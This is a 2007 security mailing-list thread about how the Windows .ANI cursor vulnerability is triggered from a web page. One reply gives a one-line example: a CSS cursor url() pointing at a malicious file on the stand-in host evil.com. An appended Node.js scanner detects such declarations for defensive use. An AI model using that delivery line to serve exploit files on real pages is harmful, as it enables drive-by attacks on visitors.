funsec mailing list archives

RE: How do you load a .ANI from a web page?


From: "Larry Seltzer" <Larry () larryseltzer com>
Date: Sat, 31 Mar 2007 17:51:05 -0400

Thanks. BTW, I had also read that Firefox would be affected by this bug,
but their docs
(http://developer.mozilla.org/en/docs/Using_URL_values_for_the_cursor_property)
specifically state that .ANI is not supported.
 
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
<http://blog.ziffdavis.com/seltzer>
Contributing Editor, PC Magazine
larryseltzer () ziffdavis com 
 

________________________________

From: avivra [mailto:avivra () gmail com] 
Sent: Saturday, March 31, 2007 5:47 PM
To: Larry Seltzer; funsec () linuxbox org
Subject: RE: [funsec] How do you load a .ANI from a web page?



Hi Larry,

 

A cursor css style.

e.g. <div style="cursor:url(http://evil.com/mal.ani)"></div>

 

More info can be found here:
http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/reference/properties/cursor.asp

 

--Aviv.

 

From: funsec-bounces () linuxbox org [mailto:funsec-bounces () linuxbox org]
On Behalf Of Larry Seltzer
Sent: Sunday, April 01, 2007 12:15 AM
To: funsec () linuxbox org
Subject: [funsec] How do you load a .ANI from a web page?

 

I keep hearing that the .ANI vulnerability can be invoked just by
viewing a web page.

 

How do you load a .ANI file from a web page?

 

Related question: I keep hearing that you can be exploited from plain
text mail. How the hell is this possible, or is it just a matter of web
links and file attachments?

 

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/

Contributing Editor, PC Magazine
larryseltzer () ziffdavis com 

 

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.
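
A defender's view of the mechanism Aviv describes, as an added example that is not part of the original thread: a Node.js scan of HTML or CSS text for cursor declarations that fetch a cursor file through url(), marking remote targets and .ani names. The function name, field names and sample markup are assumptions constructed for illustration; the extension test is a naming heuristic, not a file-format check.

```javascript
// Constructed sample page: one inline style (the form quoted in the thread),
// one <style> rule with fallback cursors, and one keyword-only cursor that
// must not be reported.
const SAMPLE_HTML = `
<div style="cursor:url(http://evil.com/mal.ani)"></div>
<style>
  a.hover { CURSOR : url( 'img/arrow.cur' ), url("/c/spin.ANI?v=2"), pointer; }
  p { cursor: wait; }
</style>`;

// A cursor declaration: the property name (not a suffix of another property),
// then everything up to the end of the declaration (; or }) or of the tag (>).
const CURSOR_DECL = /(?<![\w-])cursor\s*:\s*([^;}>]*)/gi;
// Each url(...) inside that value, quoted or bare.
const URL_FN = /url\(\s*(['"]?)([^'")\s]+)\1\s*\)/gi;

// Hypothetical helper: returns one finding per cursor url() in the markup.
function findCursorUrls(markup) {
  const findings = [];
  for (const decl of markup.matchAll(CURSOR_DECL)) {
    for (const u of decl[1].matchAll(URL_FN)) {
      const target = u[2];
      // Drop query string and fragment before looking at the extension.
      const path = target.split(/[?#]/)[0].toLowerCase();
      findings.push({
        url: target,
        offset: decl.index,                         // where the declaration starts
        remote: /^(https?:)?\/\//i.test(target),    // absolute or scheme-relative
        aniExtension: path.endsWith(".ani"),
      });
    }
  }
  return findings;
}

console.log(findCursorUrls(SAMPLE_HTML));
```
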
